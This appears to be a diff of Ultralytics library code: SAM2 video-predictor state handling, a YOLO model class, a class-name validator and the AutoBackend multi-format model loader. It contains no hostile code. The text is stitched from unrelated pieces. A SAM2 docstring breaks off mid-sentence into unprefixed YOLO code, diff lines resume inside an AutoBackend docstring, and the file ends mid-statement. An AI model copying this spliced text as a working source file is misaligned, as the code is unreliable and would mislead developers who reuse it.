+ is_init_cond_frame = frame_idx not in self.inference_state["frames_already_tracked"] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + # Add a frame to conditioning output if it's an initial conditioning frame or + # if the model sees all frames receiving clicks/mask as conditioning frames. + is_cond = is_init_cond_frame or self.model.add_all_frames_to_correct_as_cond + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Get any previously predicted mask logits on this object and feed it along with + # the new clicks into the SAM mask decoder. + prev_sam_mask_logits = None + # lookup temporary output dict first, which contains the most recent output + # (if not found, then lookup conditioning and non-conditioning frame output) + if point_inputs is not None: + prev_out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + + if prev_out is not None and prev_out.get("pred_masks") is not None: + prev_sam_mask_logits = prev_out["pred_masks"].to(device=self.device, non_blocking=True) + # Clamp the scale of prev_sam_mask_logits to avoid rare numerical issues. + prev_sam_mask_logits.clamp_(-32.0, 32.0) + current_out = self._run_single_frame_inference( + output_dict=obj_output_dict, # run on the slice of a single object + frame_idx=frame_idx, + batch_size=1, # run on the slice of a single object + is_init_cond_frame=is_init_cond_frame, + point_inputs=point_inputs, + mask_inputs=masks, + reverse=False, + # Skip the memory encoder when adding clicks or mask. We execute the memory encoder + # at the beginning of `propagate_in_video` (after user finalize their clicks). This + # allows us to enforce non-overlapping constraints on all objects before encoding + # them into memory. 
+ run_mem_encoder=False, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + # Add the output to the output dict (to be used as future memory) + obj_temp_output_dict[storage_key][frame_idx] = current_out + + # Resize the output mask to the original video resolution + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, + is_cond=is_cond, + run_mem_encoder=False, + ) + pred_masks = consolidated_out["pred_masks"].flatten(0, 1) + return pred_masks.flatten(0, 1), torch.ones(1, dtype=pred_masks.dtype, device=pred_masks.device) + + @smart_inference_mode() + def propagate_in_video_preflight(self): + """ + Prepare inference_state and consolidate temporary outputs before tracking. + + This method marks the start of tracking, disallowing the addition of new objects until the session is reset. + It consolidates temporary outputs from `temp_output_dict_per_obj` and merges them into `output_dict`. + Additionally, it clears non-conditioning memory around input frames and ensures that the state is consistent + with the provided inputs. + """ + # Tracking has started and we don't allow adding new objects until session is reset. + self.inference_state["tracking_has_started"] = True + batch_size = len(self.inference_state["obj_idx_to_id"]) + + # Consolidate per-object temporary outputs in "temp_output_dict_per_obj" and + # add them into "output_dict". + temp_output_dict_per_obj = self.inference_state["temp_output_dict_per_obj"] + output_dict = self.inference_state["output_dict"] + # "consolidated_frame_inds" contains indices of those frames where consolidated + # temporary outputs have been added (either in this call or any previous calls + # to `propagate_in_video_preflight`). 
+ consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + for is_cond in {False, True}: + # Separately consolidate conditioning and non-conditioning temp outputs + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + # Find all the frames that contain temporary outputs for any objects + # (these should be the frames that have just received clicks or mask inputs + # via `add_new_prompts`) + temp_frame_inds = set() + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + temp_frame_inds.update(obj_temp_output_dict[storage_key].keys()) + consolidated_frame_inds[storage_key].update(temp_frame_inds) + # consolidate the temporary output across all objects on this frame + for frame_idx in temp_frame_inds: + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, is_cond=is_cond, run_mem_encoder=True + ) + # merge them into "output_dict" and also create per-object slices + output_dict[storage_key][frame_idx] = consolidated_out + self._add_output_per_object(frame_idx, consolidated_out, storage_key) + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame_idx) + + # clear temporary outputs in `temp_output_dict_per_obj` + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + obj_temp_output_dict[storage_key].clear() + + # edge case: if an output is added to "cond_frame_outputs", we remove any prior + # output on the same frame in "non_cond_frame_outputs" + for frame_idx in output_dict["cond_frame_outputs"]: + output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + for frame_idx in obj_output_dict["cond_frame_outputs"]: + obj_output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for frame_idx in
consolidated_frame_inds["cond_frame_outputs"]: + assert frame_idx in output_dict["cond_frame_outputs"] + consolidated_frame_inds["non_cond_frame_outputs"].discard(frame_idx) + + # Make sure that the frame indices in "consolidated_frame_inds" are exactly those frames + # with either points or mask inputs (which should be true under a correct workflow). + all_consolidated_frame_inds = ( + consolidated_frame_inds["cond_frame_outputs"] | consolidated_frame_inds["non_cond_frame_outputs"] + ) + input_frames_inds = set() + for point_inputs_per_frame in self.inference_state["point_inputs_per_obj"].values(): + input_frames_inds.update(point_inputs_per_frame.keys()) + for mask_inputs_per_frame in self.inference_state["mask_inputs_per_obj"].values(): + input_frames_inds.update(mask_inputs_per_frame.keys()) + assert all_consolidated_frame_inds == input_frames_inds + + @staticmethod + def init_state(predictor): + """ + Initialize an inference state for the predictor. + + This function sets up the initial state required for performing inference on video data. + It includes initializing various dictionaries and ordered dictionaries that will store + inputs, outputs, and other metadata relevant to the tracking process. + + Args: + predictor (SAM2VideoPredictor): The predictor object for which to initialize the state. 
+ """ + if len(predictor.inference_state) > 0: # means initialized + return + assert predictor.dataset is not None + assert predictor.dataset.mode == "video" + + inference_state = {} + inference_state["num_frames"] = predictor.dataset.frames + # inputs on each frame + inference_state["point_inputs_per_obj"] = {} + inference_state["mask_inputs_per_obj"] = {} + # values that don't change across frames (so we only need to hold one copy of them) + inference_state["constants"] = {} + # mapping between client-side object id and model-side object index + inference_state["obj_id_to_idx"] = OrderedDict() + inference_state["obj_idx_to_id"] = OrderedDict() + inference_state["obj_ids"] = [] + # A storage to hold the model's tracking results and states on each frame + inference_state["output_dict"] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + # Slice (view) of each object tracking results, sharing the same memory with "output_dict" + inference_state["output_dict_per_obj"] = {} + # A temporary storage to hold new outputs when user interact with a frame + # to add clicks or mask (it's merged into "output_dict" before propagation starts) + inference_state["temp_output_dict_per_obj"] = {} + # Frames that already holds consolidated outputs from click or mask inputs + # (we directly use their consolidated outputs during tracking) + inference_state["consolidated_frame_inds"] = { + "cond_frame_outputs": set(), # set containing frame indices + "non_cond_frame_outputs": set(), # set containing frame indices + } + # metadata for each tracking frame (e.g. which direction it's tracked) + inference_state["tracking_has_started"] = False + inference_state["frames_already_tracked"] = [] + predictor.inference_state = inference_state + + def get_im_features(self, im, batch=1): + """ + Extracts and processes image features using SAM2's image encoder for subsequent segmentation tasks. 
+ + Args: + im (torch.Tensor): The input image tensor. + batch (int, optional): The batch size for expanding features if there are multiple prompts. Defaults to 1. + + Returns: + vis_feats (torch.Tensor): The visual features extracted from the image. + vis_pos_embed (torch.Tensor): The positional embeddings for the visual features. + feat_sizes (List(Tuple[int])): A list containing the sizes of the extracted features. + + Note: + - If `batch` is greater than 1, the features are expanded to fit the batch size. + - The method leverages the model's `_prepare_backbone_features` method to prepare the backbone features. + """ + backbone_out = self.model.forward_image(im) + if batch > 1: # expand features if there's more than one prompt + for i, feat in enumerate(backbone_out["backbone_fpn"]): + backbone_out["backbone_fpn"][i] = feat.expand(batch, -1, -1, -1) + for i, pos in enumerate(backbone_out["vision_pos_enc"]): + pos = pos.expand(batch, -1, -1, -1) + backbone_out["vision_pos_enc"][i] = pos + _, vis_feats, vis_pos_embed, feat_sizes = self.model._prepare_backbone_features(backbone_out) + return vis_feats, vis_pos_embed, feat_sizes + + def _obj_id_to_idx(self, obj_id): + """ + Map client-side object id to model-side object index. + + Args: + obj_id (int): The unique identifier of the object provided by the client side. + + Returns: + obj_idx (int): The index of the object on the model side. + + Raises: + RuntimeError: If an attempt is made to add a new object after tracking has started. + + Note: + - The method updates or retrieves mappings between object IDs and indices stored in + `inference_state`. + - It ensures that new objects can only be added before tracking commences. + - It maintains two-way mappings between IDs and indices (`obj_id_to_idx` and `obj_idx_to_id`). + - Additional data structures are initialized for the new object to store inputs and outputs. 
+ """ + obj_idx = self.inference_state["obj_id_to_idx"].get(obj_id, None) + if obj_idx is not None: + return obj_idx + + # This is a new object id not sent to the server before. We only allow adding + # new objects *before* the tracking starts. + allow_new_object = not self.inference_state["tracking_has_started"] + if allow_new_object: + # get the next object slot + obj_idx = len(self.inference_state["obj_id_to_idx"]) + self.inference_state["obj_id_to_idx"][obj_id] = obj_idx + self.inference_state["obj_idx_to_id"][obj_idx] = obj_id + self.inference_state["obj_ids"] = list(self.inference_state["obj_id_to_idx"]) + # set up input and output structures for this object + self.inference_state["point_inputs_per_obj"][obj_idx] = {} + self.inference_state["mask_inputs_per_obj"][obj_idx] = {} + self.inference_state["output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + self.inference_state["temp_output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + return obj_idx + else: + raise RuntimeError( + f"Cannot add new object id {obj_id} after tracking starts. " + f"All existing object ids: {self.inference_state['obj_ids']}. " + f"Please call 'reset_state' to restart from scratch." + ) + + def _run_single_frame_inference( + self, + output_dict, + frame_idx, + batch_size, + is_init_cond_frame, + point_inputs, + mask_inputs, + reverse, + run_mem_encoder, + prev_sam_mask_logits=None, + ): + """ + Run tracking on a single frame based on current inputs and previous memory. + + Args: + output_dict (Dict): The dictionary containing the output states of the tracking process. + frame_idx (int): The index of the current frame. + batch_size (int): The batch size for processing the frame. 
+ is_init_cond_frame (bool): Indicates if the current frame is an initial conditioning frame. + point_inputs (Dict | None): Input points and their labels, or None if no point prompts are given. + mask_inputs (torch.Tensor | None): Input binary masks, or None if no mask prompts are given. + reverse (bool): Indicates if the tracking should be performed in reverse order. + run_mem_encoder (bool): Indicates if the memory encoder should be executed. + prev_sam_mask_logits (torch.Tensor, Optional): Previous mask logits for the current object. Defaults to None. + + Returns: + current_out (dict): A dictionary containing the output of the tracking step, including updated features and predictions. + + Raises: + AssertionError: If both `point_inputs` and `mask_inputs` are provided. + + Note: + - The method assumes that `point_inputs` and `mask_inputs` are mutually exclusive; both may be None when tracking a frame without new prompts. + - The method retrieves image features using the `get_im_features` method. + - The `maskmem_pos_enc` is assumed to be constant across frames, hence only one copy is stored. + - The `fill_holes_in_mask_scores` function is commented out and currently unsupported due to CUDA extension requirements.
+ """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features( + self.inference_state["im"], batch_size + ) + + # point and mask should not appear as input simultaneously on the same frame + assert point_inputs is None or mask_inputs is None + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=is_init_cond_frame, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=point_inputs, + mask_inputs=mask_inputs, + output_dict=output_dict, + num_frames=self.inference_state["num_frames"], + track_in_reverse=reverse, + run_mem_encoder=run_mem_encoder, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + + maskmem_features = current_out["maskmem_features"] + if maskmem_features is not None: + current_out["maskmem_features"] = maskmem_features.to( + dtype=torch.float16, device=self.device, non_blocking=True + ) + # NOTE: Do not support the `fill_holes_in_mask_scores` function since it needs cuda extensions + # potentially fill holes in the predicted masks + # if self.fill_hole_area > 0: + # pred_masks = current_out["pred_masks"].to(self.device, non_blocking=True) + # pred_masks = fill_holes_in_mask_scores(pred_masks, self.fill_hole_area) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + current_out["maskmem_pos_enc"] = self._get_maskmem_pos_enc(current_out["maskmem_pos_enc"]) + return current_out + + def _get_maskmem_pos_enc(self, out_maskmem_pos_enc): + """ + Caches and manages the positional encoding for mask memory across frames and objects. + + This method optimizes storage by caching the positional encoding (`maskmem_pos_enc`) for + mask memory, which is constant across frames and objects, thus reducing the amount of + redundant information stored during an inference session. 
It checks if the positional + encoding has already been cached; if not, it caches a slice of the provided encoding. + If the batch size is greater than one, it expands the cached positional encoding to match + the current batch size. + + Args: + out_maskmem_pos_enc (List[torch.Tensor] or None): The positional encoding for mask memory. + Should be a list of tensors or None. + + Returns: + out_maskmem_pos_enc (List[torch.Tensor]): The positional encoding for mask memory, either cached or expanded. + + Note: + - The method assumes that `out_maskmem_pos_enc` is a list of tensors or None. + - Only a single object's slice is cached since the encoding is the same across objects. + - The method checks if the positional encoding has already been cached in the session's constants. + - If the batch size is greater than one, the cached encoding is expanded to fit the batch size. + """ + model_constants = self.inference_state["constants"] + # "out_maskmem_pos_enc" should be either a list of tensors or None + if out_maskmem_pos_enc is not None: + if "maskmem_pos_enc" not in model_constants: + assert isinstance(out_maskmem_pos_enc, list) + # only take the slice for one object, since it's same across objects + maskmem_pos_enc = [x[0:1].clone() for x in out_maskmem_pos_enc] + model_constants["maskmem_pos_enc"] = maskmem_pos_enc + else: + maskmem_pos_enc = model_constants["maskmem_pos_enc"] + # expand the cached maskmem_pos_enc to the actual batch size + batch_size = out_maskmem_pos_enc[0].size(0) + if batch_size > 1: + out_maskmem_pos_enc = [x.expand(batch_size, -1, -1, -1) for x in maskmem_pos_enc] + return out_maskmem_pos_enc + + def _consolidate_temp_output_across_obj( + self, + frame_idx, + is_cond=False, + run_mem_encoder=False, + ): + """ + Consolidates per-object temporary outputs into a single output for all objects. + + This method combines the temporary outputs for each object on a given frame into a unified + output. 
It fills in any missing objects either from the main output dictionary or leaves + placeholders if they do not exist in the main output. Optionally, it can re-run the memory + encoder after applying non-overlapping constraints to the object scores. + + Args: + frame_idx (int): The index of the frame for which to consolidate outputs. + is_cond (bool, Optional): Indicates if the frame is considered a conditioning frame. + Defaults to False. + run_mem_encoder (bool, Optional): Specifies whether to run the memory encoder after + consolidating the outputs. Defaults to False. + + Returns: + consolidated_out (dict): A consolidated output dictionary containing the combined results for all objects. + + Note: + - The method initializes the consolidated output with placeholder values for missing objects. + - It searches for outputs in both the temporary and main output dictionaries. + - If `run_mem_encoder` is True, it applies non-overlapping constraints and re-runs the memory encoder. + - The `maskmem_features` and `maskmem_pos_enc` are only populated when `run_mem_encoder` is True. + """ + batch_size = len(self.inference_state["obj_idx_to_id"]) + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Initialize `consolidated_out`. Its "maskmem_features" and "maskmem_pos_enc" + # will be added when rerunning the memory encoder after applying non-overlapping + # constraints to object scores. Its "pred_masks" are prefilled with a large + # negative value (NO_OBJ_SCORE) to represent missing objects. 
+ consolidated_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": torch.full( + size=(batch_size, 1, self.imgsz[0] // 4, self.imgsz[1] // 4), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "obj_ptr": torch.full( + size=(batch_size, self.model.hidden_dim), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "object_score_logits": torch.full( + size=(batch_size, 1), + # default to 10.0 for object_score_logits, i.e. assuming the object is + # present as sigmoid(10)=1, same as in `predict_masks` of `MaskDecoder` + fill_value=10.0, + dtype=torch.float32, + device=self.device, + ), + } + for obj_idx in range(batch_size): + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + # If the object doesn't appear in "temp_output_dict_per_obj" on this frame, + # we fall back and look up its previous output in "output_dict_per_obj". + # We look up both "cond_frame_outputs" and "non_cond_frame_outputs" in + # "output_dict_per_obj" to find a previous output for this object. + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + # If the object doesn't appear in "output_dict_per_obj" either, we skip it + # and leave its mask scores to the default scores (i.e. the NO_OBJ_SCORE + # placeholder above) and set its object pointer to be a dummy pointer. + if out is None: + # Fill in dummy object pointers for those objects without any inputs or + # tracking outcomes on this frame (only do it under `run_mem_encoder=True`, + # i.e. when we need to build the memory for tracking). 
+ if run_mem_encoder: + # fill object pointer with a dummy pointer (based on an empty mask) + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = self._get_empty_mask_ptr(frame_idx) + continue + # Add the temporary object output mask to consolidated output mask + consolidated_out["pred_masks"][obj_idx : obj_idx + 1] = out["pred_masks"] + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = out["obj_ptr"] + + # Optionally, apply non-overlapping constraints on the consolidated scores and rerun the memory encoder + if run_mem_encoder: + high_res_masks = F.interpolate( + consolidated_out["pred_masks"], + size=self.imgsz, + mode="bilinear", + align_corners=False, + ) + if self.model.non_overlap_masks_for_mem_enc: + high_res_masks = self.model._apply_non_overlapping_constraints(high_res_masks) + consolidated_out["maskmem_features"], consolidated_out["maskmem_pos_enc"] = self._run_memory_encoder( + batch_size=batch_size, + high_res_masks=high_res_masks, + is_mask_from_pts=True, # these frames are what the user interacted with + object_score_logits=consolidated_out["object_score_logits"], + ) + + return consolidated_out + + def _get_empty_mask_ptr(self, frame_idx): + """ + Get a dummy object pointer based on an empty mask on the current frame. + + Args: + frame_idx (int): The index of the current frame for which to generate the dummy object pointer. + + Returns: + (torch.Tensor): A tensor representing the dummy object pointer generated from the empty mask. 
+ """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features(self.inference_state["im"]) + + # Feed the empty mask and image feature above to get a dummy object pointer + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=True, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=None, + # A dummy (empty) mask with a single object + mask_inputs=torch.zeros((1, 1, *self.imgsz), dtype=torch.float32, device=self.device), + output_dict={}, + num_frames=self.inference_state["num_frames"], + track_in_reverse=False, + run_mem_encoder=False, + prev_sam_mask_logits=None, + ) + return current_out["obj_ptr"] + + def _run_memory_encoder(self, batch_size, high_res_masks, object_score_logits, is_mask_from_pts): + """ + Run the memory encoder on masks. + + This is usually after applying non-overlapping constraints to object scores. Since their scores changed, their + memory also needs to be computed again with the memory encoder. + + Args: + batch_size (int): The batch size for processing the frame. + high_res_masks (torch.Tensor): High-resolution masks for which to compute the memory. + object_score_logits (torch.Tensor): Logits representing the object scores. + is_mask_from_pts (bool): Indicates if the mask is derived from point interactions. + + Returns: + (tuple[torch.Tensor, torch.Tensor]): A tuple containing the encoded mask features and positional encoding. 
+ """ + # Retrieve correct image features + current_vision_feats, _, feat_sizes = self.get_im_features(self.inference_state["im"], batch_size) + maskmem_features, maskmem_pos_enc = self.model._encode_new_memory( + current_vision_feats=current_vision_feats, + feat_sizes=feat_sizes, + pred_masks_high_res=high_res_masks, + is_mask_from_pts=is_mask_from_pts, + object_score_logits=object_score_logits, + ) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + maskmem_pos_enc = self._get_maskmem_pos_enc(maskmem_pos_enc) + return maskmem_features.to(dtype=torch.float16, device=self.device, non_blocking=True), maskmem_pos_enc + + def _add_output_per_object(self, frame_idx, current_out, storage_key): + """ + Split a multi-object output into per-object output slices and add them into Output_Dict_Per_Obj. + + The resulting slices share the same tensor storage. + + Args: + frame_idx (int): The index of the current frame. + current_out (Dict): The current output dictionary containing multi-object outputs. + storage_key (str): The key used to store the output in the per-object output dictionary. 
+ """ + maskmem_features = current_out["maskmem_features"] + assert maskmem_features is None or isinstance(maskmem_features, torch.Tensor) + + maskmem_pos_enc = current_out["maskmem_pos_enc"] + assert maskmem_pos_enc is None or isinstance(maskmem_pos_enc, list) + + for obj_idx, obj_output_dict in self.inference_state["output_dict_per_obj"].items(): + obj_slice = slice(obj_idx, obj_idx + 1) + obj_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": current_out["pred_masks"][obj_slice], + "obj_ptr": current_out["obj_ptr"][obj_slice], + } + if maskmem_features is not None: + obj_out["maskmem_features"] = maskmem_features[obj_slice] + if maskmem_pos_enc is not None: + obj_out["maskmem_pos_enc"] = [x[obj_slice] for x in maskmem_pos_enc] + obj_output_dict[storage_key][frame_idx] = obj_out + + def _clear_non_cond_mem_around_input(self, frame_idx): + """ + Remove the non-conditioning memory around the input frame. + + When users provide correction clicks, the surrounding frames' non-conditioning memories can still contain outdated + object appearance information and could confuse the model. This method clears those non-conditioning memories + surrounding the interacted frame to avoid giving the model both old and new information about the object. + + Args: + frame_idx (int): The index of the current frame where user interaction occurred. 
class YOLO(Model):
    """YOLO (You Only Look Once) object detection model."""

    def __init__(self, model="yolo11n.pt", task=None, verbose=False):
        """Build a YOLO model, turning into a YOLOWorld instance when the model filename contains '-world'."""
        model_path = Path(model)
        is_world = "-world" in model_path.stem and model_path.suffix in {".pt", ".yaml", ".yml"}
        if not is_world:
            # Regular YOLO initialization
            super().__init__(model=model, task=task, verbose=verbose)
            return

        # YOLOWorld PyTorch/YAML model: adopt the class and the state of a freshly built YOLOWorld
        world = YOLOWorld(model_path, verbose=verbose)
        self.__class__ = type(world)
        self.__dict__ = world.__dict__

    @property
    def task_map(self):
        """Return the model, trainer, validator, and predictor classes registered for each task."""
        classify, detect, segment, pose, obb = yolo.classify, yolo.detect, yolo.segment, yolo.pose, yolo.obb
        return {
            "classify": dict(
                model=ClassificationModel,
                trainer=classify.ClassificationTrainer,
                validator=classify.ClassificationValidator,
                predictor=classify.ClassificationPredictor,
            ),
            "detect": dict(
                model=DetectionModel,
                trainer=detect.DetectionTrainer,
                validator=detect.DetectionValidator,
                predictor=detect.DetectionPredictor,
            ),
            "segment": dict(
                model=SegmentationModel,
                trainer=segment.SegmentationTrainer,
                validator=segment.SegmentationValidator,
                predictor=segment.SegmentationPredictor,
            ),
            "pose": dict(
                model=PoseModel,
                trainer=pose.PoseTrainer,
                validator=pose.PoseValidator,
                predictor=pose.PosePredictor,
            ),
            "obb": dict(
                model=OBBModel,
                trainer=obb.OBBTrainer,
                validator=obb.OBBValidator,
                predictor=obb.OBBPredictor,
            ),
        }
def check_class_names(names):
    """
    Validate and normalize class names.

    Lists are converted to `{index: name}` dicts, dict keys are cast to int and values to str, and ImageNet class
    codes (i.e. 'n01440764') are mapped to human-readable names.

    Args:
        names (list | dict): Class names as a list, or as a dict keyed by class index. Any other object is
            returned unchanged.

    Returns:
        (dict): Normalized `{int: str}` mapping; an empty list or dict yields an empty dict.

    Raises:
        KeyError: If an n-class dict has indices outside the range 0 to n-1.
    """
    if isinstance(names, list):  # names is a list
        names = dict(enumerate(names))  # convert to dict
    if isinstance(names, dict):
        # Convert 1) string keys to int, i.e. '0' to 0, and non-string values to strings, i.e. True to 'True'
        names = {int(k): str(v) for k, v in names.items()}
        if not names:
            return names  # nothing to validate, and min()/max() would raise on an empty dict
        n = len(names)
        lowest, highest = min(names), max(names)
        # n distinct integer keys within 0..n-1 guarantee that index 0 exists for the ImageNet check below
        if lowest < 0 or highest >= n:
            raise KeyError(
                f"{n}-class dataset requires class indices 0-{n - 1}, but you have invalid class indices "
                f"{lowest}-{highest} defined in your dataset YAML."
            )
        if names[0].startswith("n0"):  # imagenet class codes, i.e. 'n01440764'
            names_map = yaml_load(ROOT / "cfg/datasets/ImageNet.yaml")["map"]  # human-readable names
            names = {k: names_map[v] for k, v in names.items()}
    return names
+ data (str | Path | optional): Path to the additional data.yaml file containing class names. Optional. + fp16 (bool): Enable half-precision inference. Supported only on specific backends. Defaults to False. + batch (int): Batch-size to assume for inference. + fuse (bool): Fuse Conv2D + BatchNorm layers for optimization. Defaults to True. + verbose (bool): Enable verbose logging. Defaults to True. + """ + super().__init__() + w = str(weights[0] if isinstance(weights, list) else weights) + nn_module = isinstance(weights, torch.nn.Module) + ( + pt, + jit, + onnx, + xml, + engine, + coreml, + saved_model, + pb, + tflite, + edgetpu, + tfjs, + paddle, + mnn, + ncnn, + imx, + triton, + ) = self._model_type(w) + fp16 &= pt or jit or onnx or xml or engine or nn_module or triton # FP16 + nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) + stride = 32 # default stride + model, metadata, task = None, None, None + + # Set device + cuda = torch.cuda.is_available() and device.type != "cpu" # use CUDA + if cuda and not any([nn_module, pt, jit, engine, onnx]): # GPU dataloader formats + device = torch.device("cpu") + cuda = False + + # Download if not local + if not (pt or triton or nn_module): + w = attempt_download_asset(w) + + # In-memory PyTorch model + if nn_module: + model = weights.to(device) + if fuse: + model = model.fuse(verbose=verbose) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + pt = True + + # PyTorch + elif pt: + from ultralytics.nn.tasks import attempt_load_weights + + model = attempt_load_weights( + weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse + ) + if hasattr(model, "kpt_shape"): + kpt_shape = 
model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + + # TorchScript + elif jit: + LOGGER.info(f"Loading {w} for TorchScript inference...") + extra_files = {"config.txt": ""} # model metadata + model = torch.jit.load(w, _extra_files=extra_files, map_location=device) + model.half() if fp16 else model.float() + if extra_files["config.txt"]: # load metadata dict + metadata = json.loads(extra_files["config.txt"], object_hook=lambda x: dict(x.items())) + + # ONNX OpenCV DNN + elif dnn: + LOGGER.info(f"Loading {w} for ONNX OpenCV DNN inference...") + check_requirements("opencv-python>=4.5.4") + net = cv2.dnn.readNetFromONNX(w) + + # ONNX Runtime and IMX + elif onnx or imx: + LOGGER.info(f"Loading {w} for ONNX Runtime inference...") + check_requirements(("onnx", "onnxruntime-gpu" if cuda else "onnxruntime")) + if IS_RASPBERRYPI or IS_JETSON: + # Fix 'numpy.linalg._umath_linalg' has no attribute '_ilp64' for TF SavedModel on RPi and Jetson + check_requirements("numpy==1.23.5") + import onnxruntime + + providers = onnxruntime.get_available_providers() + if not cuda and "CUDAExecutionProvider" in providers: + providers.remove("CUDAExecutionProvider") + elif cuda and "CUDAExecutionProvider" not in providers: + LOGGER.warning("WARNING ⚠️ Failed to start ONNX Runtime session with CUDA. 
Falling back to CPU...") + device = torch.device("cpu") + cuda = False + LOGGER.info(f"Preferring ONNX Runtime {providers[0]}") + if onnx: + session = onnxruntime.InferenceSession(w, providers=providers) + else: + check_requirements( + ["model-compression-toolkit==2.1.1", "sony-custom-layers[torch]==0.2.0", "onnxruntime-extensions"] + ) + w = next(Path(w).glob("*.onnx")) + LOGGER.info(f"Loading {w} for ONNX IMX inference...") + import mct_quantizers as mctq + from sony_custom_layers.pytorch.object_detection import nms_ort # noqa + + session = onnxruntime.InferenceSession( + w, mctq.get_ort_session_options(), providers=["CPUExecutionProvider"] + ) + task = "detect" + + output_names = [x.name for x in session.get_outputs()] + metadata = session.get_modelmeta().custom_metadata_map + dynamic = isinstance(session.get_outputs()[0].shape[0], str) + if not dynamic: + io = session.io_binding() + bindings = [] + for output in session.get_outputs(): + y_tensor = torch.empty(output.shape, dtype=torch.float16 if fp16 else torch.float32).to(device) + io.bind_output( + name=output.name, + device_type=device.type, + device_id=device.index if cuda else 0, + element_type=np.float16 if fp16 else np.float32, + shape=tuple(y_tensor.shape), + buffer_ptr=y_tensor.data_ptr(), + ) + bindings.append(y_tensor) + + # OpenVINO + elif xml: + LOGGER.info(f"Loading {w} for OpenVINO inference...") + check_requirements("openvino>=2024.0.0") + import openvino as ov + + core = ov.Core() + w = Path(w) + if not w.is_file(): # if not *.xml + w = next(w.glob("*.xml")) # get *.xml file from *_openvino_model dir + ov_model = core.read_model(model=str(w), weights=w.with_suffix(".bin")) + if ov_model.get_parameters()[0].get_layout().empty: + ov_model.get_parameters()[0].set_layout(ov.Layout("NCHW")) + + # OpenVINO inference modes are 'LATENCY', 'THROUGHPUT' (not recommended), or 'CUMULATIVE_THROUGHPUT' + inference_mode = "CUMULATIVE_THROUGHPUT" if batch > 1 else "LATENCY" + LOGGER.info(f"Using OpenVINO 
{inference_mode} mode for batch={batch} inference...") + ov_compiled_model = core.compile_model( + ov_model, + device_name="AUTO", # AUTO selects best available device, do not modify + config={"PERFORMANCE_HINT": inference_mode}, + ) + input_name = ov_compiled_model.input().get_any_name() + metadata = w.parent / "metadata.yaml" + + # TensorRT + elif engine: + LOGGER.info(f"Loading {w} for TensorRT inference...") + try: + import tensorrt as trt # noqa https://developer.nvidia.com/nvidia-tensorrt-download + except ImportError: + if LINUX: + check_requirements("tensorrt>7.0.0,!=10.1.0") + import tensorrt as trt # noqa + check_version(trt.__version__, ">=7.0.0", hard=True) + check_version(trt.__version__, "!=10.1.0", msg="https://github.com/ultralytics/ultralytics/pull/14239") + if device.type == "cpu": + device = torch.device("cuda:0") + Binding = namedtuple("Binding", ("name", "dtype", "shape", "data", "ptr")) + logger = trt.Logger(trt.Logger.INFO) + # Read file + with open(w, "rb") as f, trt.Runtime(logger) as runtime: + try: + meta_len = int.from_bytes(f.read(4), byteorder="little") # read metadata length + metadata = json.loads(f.read(meta_len).decode("utf-8")) # read metadata + except UnicodeDecodeError: + f.seek(0) # engine file may lack embedded Ultralytics metadata + model = 